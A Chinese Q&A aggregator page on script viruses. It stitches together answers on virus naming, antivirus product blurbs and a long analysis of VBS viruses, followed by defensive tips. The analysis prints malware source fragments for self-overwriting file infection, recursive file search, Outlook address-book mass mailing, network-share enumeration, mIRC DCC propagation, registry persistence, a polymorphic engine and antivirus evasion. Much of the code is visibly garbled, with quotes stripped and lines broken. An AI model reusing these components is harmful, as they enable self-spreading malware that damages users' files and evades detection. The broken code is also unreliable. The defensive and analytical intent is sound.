當前位置:首頁 » 網頁前端 » 腳本病毒代碼分析和查看實驗內容
擴展閱讀
webinf下怎麼引入js 2023-08-31 21:54:13
堡壘機怎麼打開web 2023-08-31 21:54:11

腳本病毒代碼分析和查看實驗內容

發布時間: 2022-01-29 11:42:14

『壹』 什麼是腳本病毒

什麼是惡意腳本?
惡意腳本是指一切以製造危害或者損害系統功能為目的而從軟體系統中增加、改變或刪除的任何腳本。傳統的惡意腳本包括:病毒,蠕蟲,特洛伊木馬,和攻擊性腳本。更新的例子包括: Java攻擊小程序(Java attack applets)和危險的ActiveX控制項。
防治惡意腳本,應該採取以下措施 :
第一,上網時開啟瑞星殺毒軟體的八大監控。
第二,不要輕易瀏覽不良網站。
第三,如果懷疑自己感染了惡意腳本,可以登陸瑞星免費查毒網站,對自己的電腦進行全面掃描。

具體的原理和防範方法到這里去學習下:
http://www.yesky.com/SoftChannel/72356699872165888/20031015/1736105.shtml

『貳』 什麼叫腳本病毒又何危害

腳本病毒

這類病毒編寫最為簡單,但造成的危害非常大。我們常見的瀏覽了xx站點就被改了主頁,在收藏夾里被添加上很多無謂的東西,就是拜這類病毒所賜。

病毒描述:這類病毒的本質是利用腳本解釋器的檢查漏洞和用戶許可權設置不當進行感染傳播;病毒本身是ascii碼或者加密的ascii碼,通過特定的腳本解釋器執行產生規定行為,因其行為對計算機用戶造成傷害,因此被定性為惡意程序。最常見的行為就是修改用戶主頁,搜索頁,修改用戶收藏夾,在每個文件夾下放置自動執行文件拖慢系統速度等;比較出名的如美利莎郵件病毒、新歡樂時光病毒、office的宏病毒等都屬於這類。

病毒淺析:為了完成一些自動化的任務,需要用程序方式來實現。但復雜的程序編寫又不是非程序人員能夠勝任的。為了提高工作效率,方便用戶操作,加強系統特性,於是許多軟體/操作系統都預留了介面給用戶,用簡單的方法編寫一些完成一定功能的小程序。程序本身是ascii碼的,不編譯,直接解釋執行,在調試/修改使用上相當簡便,雖然犧牲一定效率,但是換來了易用性。這本是一個良好的願望,但太多的時候,這沒有起到積極的作用,反而為腳本病毒編寫者提供了良機。

以web病毒為例,由於用戶缺乏安全意識用錯誤的許可權登陸,導致ie中的解釋器使用wsh可以操作硬碟上的文件和注冊表,而javascript和vbscript調用wsh是很容易的事情——於是惡意腳本的作者只需要讓你訪問該頁面,就能在你本地寫上一些惡意的腳本,在注冊表裡修改你的主頁/搜索項了。而利用ie的activex檢查漏洞,則可以在不提示地情況下從網路上下載文件並自動執行——這就成了木馬攻擊的前奏曲;利用mime頭漏洞,則可以用一個以jpg結尾的url中,指向一個事實上的web頁,然後在web頁中內嵌圖片+惡意代碼的方式迷惑計算機用戶;利用outlook自動讀去eml的特性和mime頭檢查不嚴格來執行惡意2進制代碼;利用本地硬碟上有執行autorun.inf的特性(這功能本來是光碟機用的,我們的光碟之所以放進去就能自動讀出程序,就是光碟上有個名為autorun.inf文件起的作用,它是個文本文件,各位可以看看)把一些需要載入的程序寫到該文件下導致每次訪問該分區的時候就會自動運行;利用windows下會優先讀取folder.htt和desktop.ini的特性,將惡意代碼寫入其中,導致訪問任何一個文件夾的時候都會啟動該病毒,再配合上鎖定注冊表的功能,殺除起來異常麻煩——不復雜,但是相當煩瑣,一不留意沒殺干凈一處,又導致死灰復燃,前功盡棄。

病毒自查:上面有提到,這類病毒一般以搗亂居多,所以特別容易發現。而其另一個作用是作為木馬進駐系統的先遣部隊,利用瀏覽器漏洞等達到下載木馬文件到本地硬碟,並修改啟動項,達到下次啟機運行的目的。因此一旦發現木馬的同時,也可以檢查一下是不是有些可疑的腳本文件。

病毒查殺:這類病毒一般來說由於其編寫靈活,源代碼公開,所以衍生版本格外地多;殺毒軟體/木馬殺除軟體對待這類病毒大多沒用。而由於腳本病毒(除宏病毒外)大多是獨立文件,只要將這些文件查找出來刪除掉就行了。不過這里值得留意的是,利用微軟的瀏覽器的漏洞,在點擊選擇某些文件的同時就自動執行了,甚至打開瀏覽器的同時腳本病毒就開始駐留感染——這樣是無法殺除干凈的。

正確的做法是使用其他第三方的資源瀏覽器,例如Total Command就是一個非常不錯的選擇。查殺大致過程如下:首先,在資源瀏覽器——工具——文件夾選項中,將「使用Windows傳統風格的桌面」取消掉,在桌面上點右鍵,點「屬性」——「桌面設置」,將使用活動桌面取消,接著查殺可疑對象;常見查殺對象:各個根分區下的autorun.inf,各個目錄下的desktop.ini和folder.htt(有幾個是系統自帶的,不過刪除了也無關系的),這一步最好採用第三方的資源瀏覽器,例如前面介紹的Total Command來完成。在這一步,最忌諱查殺不凈,即使有一個病毒遺漏,很快就又遍布各個文件夾內了。關於郵件病毒的殺除使用專殺工具就行了。

病毒殘留:純粹腳本病毒在殺除後不會有任何殘留,但由於目前的病毒大都採用復合形態,捆綁多種傳染方式和多種特性,因此不少腳本病毒只是將用戶機器的安全防線撕開的前奏——真正的破壞主力木馬、蠕蟲尾隨其後進入系統,因此在殺除掉腳本病毒後,非常有必要連帶著檢查系統中是否已經有了木馬和蠕蟲病毒。

病毒防禦:腳本病毒的特性之一就是被動觸發——因此防禦腳本病毒最好的方法是不訪問帶毒的文件/web網頁,在網路時代,腳本病毒更以欺騙的方式引誘人運行居多。由於ie本身存在多個漏洞,特別是執行activex的功能存在相當大的弊端,最近爆出的重大漏洞都和它有關,包括mozilla的windows版本也未能倖免。因此個人推薦使用myie2軟體代替ie作為默認瀏覽器,因為myie2中有個方便的功能是啟用/禁用web頁面的activex控制項,在默認的時候,可以將頁面中的activex控制項全部禁用,待訪問在線電影類等情況下根據自己的需要再啟用。關於郵件病毒,大多以eml作為文件後綴的,如果您單機有用outlook取信的習慣,最好准備一個能檢測郵件病毒的殺毒軟體並及時升級。如果非必要,將word等office軟體中的宏選項設置為禁用。腳本病毒是目前網路上最為常見的一類病毒,它編寫容易,源代碼公開,修改起來相當容易和方便,而且往往給用戶造成的巨大危害。

以上4類程序的介紹,為了降低學習難度,我是單態方式來介紹的。事實上目前的病毒大多以具有上面4類程序中的2到3類的特徵,因此無論感染,傳播,殺除的困難都大大增加。例如發文前夕的mydoom新變種病毒的分析中:它利用系統漏洞/郵件群發/共享漏洞方式傳播(具備了蠕蟲、腳本病毒和新型病毒的傳播特性),進駐用戶系統後上載自身並運行(木馬特性),獲取用戶本地outlook中的地址本(木馬特性),通過調用google等搜索引擎獲取用戶email地址本中同後綴的相關選項(調用系統程序,木馬功能),再主動給地址本中的每個程序發出email(木馬特性)。對待這樣一個病毒,無論是系統存在漏洞、共享安全設置不當、或者隨意地打開了「朋友」發來的email,都可能導致中毒。關於中毒途徑的分析,留待下一站《攻擊防禦之旅》內一並介紹。

在從第一個病毒出現到現在,已經有整整半個世紀了,病毒的發展日新月異,令查殺的困難大大增加,造成的損失也異常巨大。或許,計算機病毒這個幽靈,從計算機誕生的那一刻起就註定要如影相隨的。只要還有用心險惡的人存在,那麼病毒就不會消亡。病毒之戰,恐怕會在今後的日子裡越演越烈……

『叄』 常見的腳本病毒有哪些

1、系統病毒

系統病毒的前綴為:Win32、PE、Win95、W32、W95等。這些病毒的一般公有的特性是可以感染windows操作系統的 *.exe 和 *.dll 文件,並通過這些文件進行傳播。如CIH病毒。

2、蠕蟲病毒

蠕蟲病毒的前綴是:Worm。這種病毒的公有特性是通過網路或者系統漏洞進行傳播,很大部分的蠕蟲病毒都有向外發送帶毒郵件,阻塞網路的特性。比如沖擊波(阻塞網路),小郵差(發帶毒郵件) 等。

3、木馬病毒、黑客病毒

木馬病毒其前綴是:Trojan,黑客病毒前綴名一般為 Hack 。木馬病毒的公有特性是通過網路或者系統漏洞進入用戶的系統並隱藏,然後向外界泄露用戶的信息,而黑客病毒則有一個可視的界面,能對用戶的電腦進行遠程式控制制。木馬、黑客病毒往往是成對出現的,即木馬病毒負責侵入用戶的電腦,而黑客病毒則會通過該木馬病毒來進行控制。現在這兩種類型都越來越趨向於整合了。一般的木馬如QQ消息尾巴木馬 Trojan.QQ3344 ,還有大家可能遇見比較多的針對網路游戲的木馬病毒如 Trojan.LMir.PSW.60 。這里補充一點,病毒名中有PSW或者什麼PWD之類的一般都表示這個病毒有盜取密碼的功能(這些字母一般都為「密碼」的英文「password」的縮寫)一些黑客程序如:網路梟雄(Hack.Nether.Client)等。

4、腳本病毒

腳本病毒的前綴是:Script。腳本病毒的公有特性是使用腳本語言編寫,通過網頁進行的傳播的病毒,如紅色代碼(Script.Redlof)——可不是我們的老大代碼兄哦 ^_^。腳本病毒還會有如下前綴:VBS、JS(表明是何種腳本編寫的),如歡樂時光(VBS.Happytime)、十四日(Js.Fortnight.c.s)等。

5、宏病毒

其實宏病毒是也是腳本病毒的一種,由於它的特殊性,因此在這里單獨算成一類。宏病毒的前綴是:Macro,第二前綴是:Word、Word97、Excel、Excel97(也許還有別的)其中之一。凡是只感染WORD97及以前版本WORD文檔的病毒採用Word97做為第二前綴,格式是:Macro.Word97;凡是只感染WORD97以後版本WORD文檔的病毒採用Word做為第二前綴,格式是:Macro.Word;凡是只感染EXCEL97及以前版本EXCEL文檔的病毒採用Excel97做為第二前綴,格式是:Macro.Excel97;凡是只感染EXCEL97以後版本EXCEL文檔的病毒採用Excel做為第二前綴,格式是:Macro.Excel,依此類推。該類病毒的公有特性是能感染OFFICE系列文檔,然後通過OFFICE通用模板進行傳播,如:著名的美麗莎(Macro.Melissa)。

6、後門病毒

後門病毒的前綴是:Backdoor。該類病毒的公有特性是通過網路傳播,給系統開後門,給用戶電腦帶來安全隱患。如54很多朋友遇到過的IRC後門Backdoor.IRCBot 。

7、病毒種植程序病毒

這類病毒的公有特性是運行時會從體內釋放出一個或幾個新的病毒到系統目錄下,由釋放出來的新病毒產生破壞。如:冰河播種者(Dropper.BingHe2.2C)、MSN射手(Dropper.Worm.Smibag)等。

8.破壞性程序病毒

破壞性程序病毒的前綴是:Harm。這類病毒的公有特性是本身具有好看的圖標來誘惑用戶點擊,當用戶點擊這類病毒時,病毒便會直接對用戶計算機產生破壞。如:格式化C盤(Harm.formatC.f)、殺手命令(Harm.Command.Killer)等。

9.玩笑病毒

玩笑病毒的前綴是:Joke。也稱惡作劇病毒。這類病毒的公有特性是本身具有好看的圖標來誘惑用戶點擊,當用戶點擊這類病毒時,病毒會做出各種破壞操作來嚇唬用戶,其實病毒並沒有對用戶電腦進行任何破壞。如:女鬼(Joke.Girlghost)病毒。

10.捆綁機病毒

捆綁機病毒的前綴是:Binder。這類病毒的公有特性是病毒作者會使用特定的捆綁程序將病毒與一些應用程序如QQ、IE捆綁起來,表面上看是一個正常的文件,當用戶運行這些捆綁病毒時,會表面上運行這些應用程序,然後隱藏運行捆綁在一起的病毒,從而給用戶造成危害。如:捆綁QQ(Binder.QQPass.QQBin)、系統殺手(Binder.killsys)等。

『肆』 怎樣讀出病毒的代碼

病毒可以分為兩類-腳本病毒和非腳本病毒

1.腳本病毒
如果是腳本病毒的話,象以bat,vbs,hta,htm結尾的病毒文件等等,都是可以用筆記本打開的,打開後就可以讀出病毒代碼了,
舉個例子,歡樂時光是一個很有名的腳本病毒,他是一個程序高手利用hta文件編輯出來的,功能強大。你可以到網上搜 「歡樂時光 病毒 代碼」 然後就可以得到他的代碼了

2.非腳本病毒
這個大多數是以VB,VC,DELPHI編輯出來的病毒,後綴大多是exe,這樣的病毒是不可以用文檔編輯的,所以代碼也不可以知道,但是,如果你精通匯編的話,可以查看他的匯編代碼(非原始代碼),可以了解他運行後會怎樣工作。

『伍』 解釋一個VBS腳本病毒代碼

有一段的解釋是:要修改管理員用戶的名字與許可權,還有就是要生成些病毒編寫者的其他自己編寫的文件,還有就是系統路徑的修改的問題,還有就是管理員用戶的系統的終端的修改,創建有病毒編寫者的自己的鍵值。

『陸』 以下面代碼為例,分析VBS腳本病毒感染及搜索文件的方法

我不做槍手,不懂的語句可看 Microsoft Windows腳本技術 ,網上有的下

『柒』 如何查殺腳本病毒

卡巴斯基單機版(Kaspersky Anti-Virus Personal)是俄羅斯著名數據安全廠商Kaspersky Labs專為我.
國個人用戶度身定製的反病毒產品。這款產品功能包括:病毒掃描、駐留後台的病毒防護程序、腳本病
毒攔截器以及郵件檢測程序,時刻監控一切病毒可能入侵的途徑。產品採用第二代啟發式代碼分析技術、iChecker實時監控技術和獨特的腳本病毒攔截技術等多種最尖端的反病毒技術,能夠有效查殺"沖擊波"、"Welchia"、"Sobig.F"等病毒及其其他8萬余種病毒,並可防範未知病毒。另外,該軟體的界面簡單、集中管理、提供多種定製方式,自動化程度高,而且幾乎所有的功能都是在後台模式下運行,系統資源佔有低。最具特色的是該產品每天兩次更新病毒代碼,更新文件只有3-20Kb,對網路帶寬的影響極其微小,能確保用戶系統得到最為安全的保護,是個人用戶的首選反病毒產品
參考資料:卡巴斯基(Kaspersky Anti-Virus) 6.0.2.621

瑞星對注冊表的監控是不錯

NOD32+360安全衛士...NOD32是全球排名第5的殺毒軟體.殺毒功能強大,查殺速度快.佔用資源少...另外,該軟體的界面簡單、集中管理、提供多種定製方式,自動化程度高,而且幾乎所有的功能都是在後台模式下運行,系統資源佔有低。最具特色的是該產品每天兩次更新病毒代碼,更新文件只有3-20Kb,對網路帶寬的影響極其微小,能確保用戶系統得到最為安全的保護,是個人用戶的首選反病毒產

『捌』 什麼是腳本病毒啊

腳本病毒通常是JavaScript代碼編寫的惡意代碼,
一般帶有廣告性質,會修改您的IE首頁、修改注冊表等信息,造成用戶使用計算機不方便。

至於你說的那個,只要是殺毒查出來的,不管他,殺了!

『玖』 VBS腳本病毒的病毒原理分析

1.vbs腳本病毒如何感染、搜索文件
VBS腳本病毒一般是直接通過自我復制來感染文件的,病毒中的絕大部分代碼都可以直接附加在其他同類程序的中間,譬如新歡樂時光病毒可以將自己的代碼附加在.htm文件的尾部,並在頂部加入一條調用病毒代碼的語句,而宏病毒則是直接生成一個文件的副本,將病毒代碼拷入其中,並以原文件名作為病毒文件名的前綴,vbs作為後綴。下面我們通過宏病毒的部分代碼具體分析一下這類病毒的感染和搜索原理:
以下是文件感染的部分關鍵代碼:
Set fso=createobject(scripting.filesystemobject)
'創建一個文件系統對象
set self=fso.opentextfile(wscript.scriptfullname,1)
'讀打開當前文件(即病毒本身)
vbs=self.readall
' 讀取病毒全部代碼到字元串變數vbs……
set ap=fso.opentextfile(目標文件.path,2,true)
' 寫打開目標文件,准備寫入病毒代碼
ap.write vbs ' 將病毒代碼覆蓋目標文件
ap.close
set cop=fso.getfile(目標文件.path) '得到目標文件路徑
cop.(目標文件.path & .vbs)
' 創建另外一個病毒文件(以.vbs為後綴)
目標文件.delete(true)
'刪除目標文件
上面描述了病毒文件是如何感染正常文件的:首先將病毒自身代碼賦給字元串變數vbs,然後將這個字元串覆蓋寫到目標文件,並創建一個以目標文件名為文件名前綴、vbs為後綴的文件副本,最後刪除目標文件。
下面我們具體分析一下文件搜索代碼:
'該函數主要用來尋找滿足條件的文件,並生成對應文件的一個病毒副本
sub scan(folder_) 'scan函數定義,
on error resume next '如果出現錯誤,直接跳過,防止彈出錯誤窗口
set folder_=fso.getfolder(folder_)
set files=folder_.files ' 當前目錄的所有文件集合
for each file in filesext=fso.GetExtensionName(file)
'獲取文件後綴
ext=lcase(ext) '後綴名轉換成小寫字母
if ext=mp5 then '如果後綴名是mp5,則進行感染。
請自己建立相應後綴名的文件,最好是非正常後綴名 ,以免破壞正常程序。
Wscript.echo (file)
end ifnextset subfolders=folder_.subfoldersfor each subfolder in subfolders '搜索其他目錄;遞歸調用
scan( ) scan(subfolder)
next
end sub
上面的代碼就是VBS腳本病毒進行文件搜索的代碼分析。搜索部分scan( )函數做得比較短小精悍,非常巧妙,採用了一個遞歸的演算法遍歷整個分區的目錄和文件。
2.vbs腳本病毒通過網路傳播的幾種方式及代碼分析
VBS腳本病毒之所以傳播范圍廣,主要依賴於它的網路傳播功能,一般來說,VBS腳本病毒採用如下幾種方式進行傳播:
1)通過Email附件傳播
這是一種用的非常普遍的傳播方式,病毒可以通過各種方法拿到合法的Email地址,最常見的就是直接取outlook地址簿中的郵件地址,也可以通過程序在用戶文檔(譬如htm文件)中搜索Email地址。
下面我們具體分析一下VBS腳本病毒是如何做到這一點的:
Function mailBroadcast()
on error resume next
wscript.echo
Set outlookApp = CreateObject(Outlook.Application)
//創建一個OUTLOOK應用的對象
If outlookApp= Outlook Then
Set mapiObj=outlookApp.GetNameSpace(MAPI)
//獲取MAPI的名字空間
Set addrList= mapiObj.AddressLists
//獲取地址表的個數
For Each addr In addrList
If addr.AddressEntries.Count <> 0 Then
addrEntCount = addr.AddressEntries.Count
//獲取每個地址表的Email記錄數
For addrEntIndex= 1 To addrEntCount
//遍歷地址表的Email地址
Set item = outlookApp.CreateItem(0)
//獲取一個郵件對象實例
Set addrEnt = addr.AddressEntries(addrEntIndex)
//獲取具體Email地址
= addrEnt.Address
//填入收信人地址
item.Subject = 病毒傳播實驗
//寫入郵件標題
item.Body = 這里是病毒郵件傳播測試,收到此信請不要慌張!
//寫入文件內容
Set attachMents=item.Attachments //定義郵件附件
attachMents.Add fileSysObj.GetSpecialFolder(0)& est.jpg.vbs
item.DeleteAfterSubmit = True
//信件提交後自動刪除
Then
item.Send
//發送郵件
shellObj.regwrite HKCUsoftwareMailtestmailed, 1
//病毒標記,以免重復感染
End If
NextEnd IfNext
End if
End Function
2)通過區域網共享傳播
區域網共享傳播也是一種非常普遍並且有效的網路傳播方式。一般來說,為了區域網內交流方便,一定存在不少共享目錄,並且具有可寫許可權,譬如win2000創建共享時,默認就是具有可寫許可權。這樣病毒通過搜索這些共享目錄,就可以將病毒代碼傳播到這些目錄之中。
在VBS中,有一個對象可以實現網上鄰居共享文件夾的搜索與文件操作。我們利用該對象就可以達到傳播的目的。
welcome_msg = 網路連接搜索測試
Set WSHNetwork = WScript.CreateObject(WScript.Network)
』創建一個網路對象
Set oPrinters = WshNetwork.EnumPrinterConnections
』創建一個網路列印機連接列表
WScript.Echo Network printer mappings:
For i = 0 to oPrinters.Count - 1Step2
』顯示網路列印機連接情況
WScript.Echo Port &oPrinters.Item(i)
& = & oPrinters.Item(i+1)
Next
Set colDrives = WSHNetwork.EnumNetworkDrives
』創建一個網路共享連接列表
If colDrives.Count = 0 Then
MsgBox 沒有可列出的驅動器。,
vbInformation + vbOkOnly,welcome_msg
Else
strMsg = 當前網路驅動器連接: &CRLF
Fori=0To colDrives.Count - 1 Step 2
strMsg = strMsg & Chr(13)&Chr(10)&colDrives(i)
& Chr(9)&colDrives(i+1)
Next
MsgBox strMsg, vbInformation + vbOkOnly,
welcome_msg』顯示當前網路驅動器連接
End If
上面是一個用來尋找當前列印機連接和網路共享連接並將它們顯示出來的完整腳本程序。在知道了共享連接之後,我們就可以直接向目標驅動器讀寫文件了。
3)通過感染htm、asp、jsp、php等網頁文件傳播
如今,WWW服務已經變得非常普遍,病毒通過感染htm等文件,勢必會導致所有訪問過該網頁的用戶機器感染病毒。
病毒之所以能夠在htm文件中發揮強大功能,採用了和絕大部分網頁惡意代碼相同的原理。基本上,它們採用了相同的代碼,不過也可以採用其它代碼,這段代碼是病毒FSO,WSH等對象能夠在網頁中運行的關鍵。在注冊表HKEY_CLASSES_ROOTCLSID下我們可以找到這么一個主鍵,注冊表中對它他的說明是「Windows Script Host Shell Object」,同樣,我們也可以找到,注冊表對它的說明是「FileSystem Object」,一般先要對COM進行初始化,在獲取相應的組件對象之後,病毒便可正確地使用FSO、WSH兩個對象,調用它們的強大功能。代碼如下所示:
Set Apple0bject = document.applets(KJ_guest)Apple0bject.setCLSID()Apple0bject.createInstance() 』創建一個實例
Set WsShell Apple0bject.Get0bject()
Apple0bject.setCLSID()
Apple0bject.createInstance()
』創建一個實例
Set FSO = Apple0bject.Get0bject()
對於其他類型文件,這里不再一一分析。
4)通過IRC聊天通道傳播
病毒通過IRC傳播一般來說採用以下代碼(以MIRC為例)
Dim mirc
set fso=CreateObject(Scripting.FileSystemObject)
set mirc=fso.CreateTextFile(C:mircscript.ini)
』創建文件script.ini
fso.CopyFile Wscript.ScriptFullName, C:mircattachment.vbs,
True 』將病毒文件備份到attachment.vbs
mirc.WriteLine [script]
mirc.WriteLine n0=on 1:join:*.*:
{if($nick !=$me) /dcc send $nick C:mircattachment.vbs }
'利用命令/ddc send $nick attachment.vbs給通道中的其他用戶傳送病毒文件
mirc.Close
以上代碼用來往Script.ini文件中寫入一行代碼,實際中還會寫入很多其他代碼。Script.ini中存放著用來控制IRC會話的命令,這個文件裡面的命令是可以自動執行的。譬如,TUNE.VBS病毒就會修改c:mircscript.ini 和 c:mircmirc.ini,使每當IRC用戶使用被感染的通道時都會收到一份經由DDC發送的TUNE.VBS。同樣,如果Pirch98已安裝在目標計算機的c:pirch98目錄下,病毒就會修改c:pirch98events.ini和c:pirch98pirch98.ini,使每當IRC用戶使用被感染的通道時都會收到一份經由DDC發送的TUNE.VBS。
另外病毒也可以通過現在廣泛流行的KaZaA進行傳播。病毒將病毒文件拷貝到KaZaA的默認共享目錄中,這樣,當其他用戶訪問這台機器時,就有可能下載該病毒文件並執行。這種傳播方法可能會隨著KaZaA這種點對點共享工具的流行而發生作用。
還有一些其他的傳播方法,我們這里不再一一列舉。
3.VBS腳本病毒如何獲得控制權
如何獲取控制權?這一個是一個比較有趣的話題,而VBS腳本病毒似乎將這個話題發揮的淋漓盡致。筆者在這里列出幾種典型的方法:
1)修改注冊表項
windows在啟動的時候,會自動載入HKEY_LOCAL_項下的各鍵值所執向的程序。腳本病毒可以在此項下加入一個鍵值指向病毒程序,這樣就可以保證每次機器啟動的時候拿到控制權。vbs修改注冊表的方法比較簡單,直接調用下面語句即可。 wsh.RegWrite(strName, anyvalue [,strType])
2)通過映射文件執行方式
譬如,我們新歡樂時光將dll的執行方式修改為wscript.exe。甚至可以將exe文件的映射指向病毒代碼。
3)欺騙用戶,讓用戶自己執行
這種方式其實和用戶的心理有關。譬如,病毒在發送附件時,採用雙後綴的文件名,由於默認情況下,後綴並不顯示,舉個例子,文件名為beauty.jpg.vbs的vbs程序顯示為beauty.jpg,這時用戶往往會把它當成一張圖片去點擊。同樣,對於用戶自己磁碟中的文件,病毒在感染它們的時候,將原有文件的文件名作為前綴,vbs作為後綴產生一個病毒文件,並刪除原來文件,這樣,用戶就有可能將這個vbs文件看作自己原來的文件運行。
4)desktop.ini和folder.htt互相配合
這兩個文件可以用來配置活動桌面,也可以用來自定義文件夾。如果用戶的目錄中含有這兩個文件,當用戶進入該目錄時,就會觸發folder.htt中的病毒代碼。這是新歡樂時光病毒採用的一種比較有效的獲取控制權的方法。並且利用folder.htt,還可能觸發exe文件,這也可能成為病毒得到控制權的一種有效方法!
病毒獲得控制權的方法還有很多,這方面作者發揮的餘地也比較大。
4.vbs腳本病毒對抗反病毒軟體的幾種技巧
病毒要生存,對抗反病毒軟體的能力也是必需的。一般來說,VBS腳本病毒採用如下幾種對抗反病毒軟體的方法:
1)自加密
譬如,新歡樂時光病毒,它可以隨機選取密鑰對自己的部分代碼進行加密變換,使得每次感染的病毒代碼都不一樣,達到了多態的效果。這給傳統的特徵值查毒法帶來了一些困難。病毒也還可以進一步的採用變形技術,使得每次感染後的加密病毒的解密後的代碼都不一樣。
下面看一個簡單的vbs腳本變形引擎(來自flyshadow)
Randomize
Set Of = CreateObject(Scripting.FileSystemObject)
』創建文件系統對象
vC = Of.OpenTextFile(WScript.ScriptFullName, 1).Readall
』讀取自身代碼
fS=Array(Of, vC, fS, fSC)
』定義一個即將被替換字元的數組
For fSC = 0 To 3
vC = Replace(vC, fS(fSC), Chr((Int(Rnd * 22) + 65))
& Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65))
& Chr((Int(Rnd * 22) + 65)))
』取4個隨機字元替換數組fS中的字元串
Next
Of.OpenTextFile(WScript.ScriptFullName, 2, 1).Writeline vC 』將替換後的代碼寫迴文件
上面這段代碼使得該VBS文件在每次運行後,其Of,vC,fS,fSC四字元串都會用隨機字元串來代替,這在很大程度上可以防止反病毒軟體用特徵值查毒法將其查出。
2)巧妙運用Execute函數
用過VBS程序的朋友是否會覺得奇怪:當一個正常程序中用到了FileSystemObject對象的時候,有些反病毒軟體會在對這個程序進行掃描的時候報告說此Vbs文件的風險為高,但是有些VBS腳本病毒同樣採用了FileSystemObject對象,為什麼卻又沒有任何警告呢?原因很簡單,就是因為這些病毒巧妙的運用了Execute方法。有些殺毒軟體檢測VBS病毒時,會檢查程序中是否聲明使用了FileSystemObject對象,如果採用了,這會發出報警。如果病毒將這段聲明代碼轉化為字元串,然後通過Execute(String)函數執行,就可以躲避某些反病毒軟體。
3)改變某些對象的聲明方法
譬如fso=createobject(scripting.filesystemobject),我們將其改變為
fso=createobject(script+ing.filesyste+mobject),這樣反病毒軟體對其進行靜態掃描時就不會發現filesystemobject對象。
4)直接關閉反病毒軟體
VBS腳本功能強大,它可以直接在搜索用戶進程然後對進程名進行比較,如果發現是反病毒軟體的進程就直接關閉,並對它的某些關鍵程序進行刪除。
5.Vbs病毒生產機的原理介紹
所謂病毒生產機就是指可以直接根據用戶的選擇產生病毒源代碼的軟體。在很多人看來這或許不可思議,其實對腳本病毒而言它的實現非常簡單。
腳本語言是解釋執行的、不需要編譯,程序中不需要什麼校驗和定位,每條語句之間分隔得比較清楚。這樣,先將病毒功能做成很多單獨的模塊,在用戶做出病毒功能選擇後,生產機只需要將相應的功能模塊拼湊起來,最後再作相應的代碼替換和優化即可。由於篇幅關系和其他原因,這里不作詳細介紹。
三、如何防範vbs腳本病毒
1.如何從樣本中提取(加密)腳本病毒
對於沒有加密的腳本病毒,我們可以直接從病毒樣本中找出來,現在介紹一下如何從病毒樣本中提取加密VBS腳本病毒,這里我們以新歡樂時光為例。
用JediEdit打開folder.htt。我們發現這個文件總共才93行,第一行,幾行注釋後,以開始,節尾。相信每個人都知道這是個什麼類型的文件吧!
第87行到91行,是如下語句:
87:
第87和91行不用解釋了,第88行是一個字元串的賦值,很明顯這是被加密過的病毒代碼。看看89行最後的一段代碼ThisText = ThisText & TempChar,再加上下面那一行,我們肯定能夠猜到ThisText裡面放的是病毒解密代碼(熟悉vbs的兄弟當然也可以分析一下這段解密代碼,too simple!就算完全不看代碼也應該可以看得出來的)。第90行是執行剛才ThisText中的那段代碼(經過解密處理後的代碼)。
那麼,下一步該怎麼做呢?很簡單,我們只要在病毒代碼解密之後,將ThisText的內容輸出到一個文本文件就可以解決了。由於上面幾行是vbscript,於是我創建了如下一個.txt文件:
首先,第88、89兩行到剛才建立的.txt文件,當然如果你願意看看新歡樂時光的執行效果,你也可以在最後輸入第90行。然後在下面一行輸入創建文件和將ThisText寫入文件vbs代碼,整個文件如下所示:
ExeString = Afi...』 第88行代碼
Execute(Dim KeyAr... 』 第89行代碼
set fso=createobject(scripting.filesystemobject)
』 創建一個文件系統對象
set virusfile=fso.createtextfile(resource.log,true)
』 創建一個新文件resource.log,
用以存放解密後的病毒代碼 virusfile.writeline(ThisText)
』 將解密後的代碼寫入resource.log
OK!就這么簡單,保存文件,將該文件後綴名.txt改為.vbs(.vbe也可以),雙擊,你會發現該文件目錄下多了一個文件resource.log,打開這個文件,怎麼樣?是不是「新歡樂時光」的源代碼啊!
2.vbs腳本病毒的弱點
vbs腳本病毒由於其編寫語言為腳本,因而它不會像PE文件那樣方便靈活,它的運行是需要條件的(不過這種條件默認情況下就具備了)。筆者認為,VBS腳本病毒具有如下弱點:
1)絕大部分VBS腳本病毒運行的時候需要用到一個對象:FileSystemObject
2)VBScript代碼是通過Windows Script Host來解釋執行的。
3)VBS腳本病毒的運行需要其關聯程序Wscript.exe的支持。
4)通過網頁傳播的病毒需要ActiveX的支持
5)通過Email傳播的病毒需要OE的自動發送郵件功能支持,但是絕大部分病毒都是以Email為主要傳播方式的。
3.如何預防和解除vbs腳本病毒
針對以上提到的VBS腳本病毒的弱點,筆者提出如下集中防範措施:
1)禁用文件系統對象FileSystemObject
方法:用regsvr32 scrrun.dll /u這條命令就可以禁止文件系統對象。其中regsvr32是WindowsSystem下的可執行文件。或者直接查找scrrun.dll文件刪除或者改名。
還有一種方法就是在注冊表中HKEY_CLASSES_ROOTCLSID下找到一個主鍵的項,咔嚓即可。
2)卸載Windows Scripting Host
在Windows 98中(NT 4.0以上同理),打開[控制面板]→[添加/刪除程序]→[Windows安裝程序]→[附件],取消「Windows Scripting Host」一項。
和上面的方法一樣,在注冊表中HKEY_CLASSES_ROOTCLSID下找到一個主鍵的項,咔嚓。
3)刪除VBS、VBE、JS、JSE文件後綴名與應用程序的映射
點擊[我的電腦]→[查看]→[文件夾選項]→[文件類型],然後刪除VBS、VBE、JS、JSE文件後綴名與應用程序的映射。
4)在Windows目錄中,找到WScript.exe,更改名稱或者刪除,如果你覺得以後有機會用到的話,最好更改名稱好了,當然以後也可以重新裝上。
5)要徹底防治VBS網路蠕蟲病毒,還需設置一下你的瀏覽器。我們首先打開瀏覽器,單擊菜單欄里「Internet 選項」安全選項卡里的[自定義級別]按鈕。把「ActiveX控制項及插件」的一切設為禁用,這樣就不怕了。呵呵,譬如新歡樂時光的那個ActiveX組件如果不能運行,網路傳播這項功能就玩完了。
6)禁止OE的自動收發郵件功能
7)由於蠕蟲病毒大多利用文件擴展名作文章,所以要防範它就不要隱藏系統中已知文件類型的擴展名。Windows默認的是「隱藏已知文件類型的擴展名稱」,將其修改為顯示所有文件類型的擴展名稱。
8)將系統的網路連接的安全級別設置至少為「中等」,它可以在一定程度上預防某些有害的Java程序或者某些ActiveX組件對計算機的侵害。
9)呵呵,最後一項不說大家也應該知道了,殺毒軟體確實很必要,盡管有些殺毒軟體挺讓廣大用戶失望,不過,選擇是雙方的哦。在這個病毒橫飛的網路,如果您的機器沒有裝上殺毒軟體我覺得確實挺不可思議的。
四、對所有腳本類病毒發展的展望
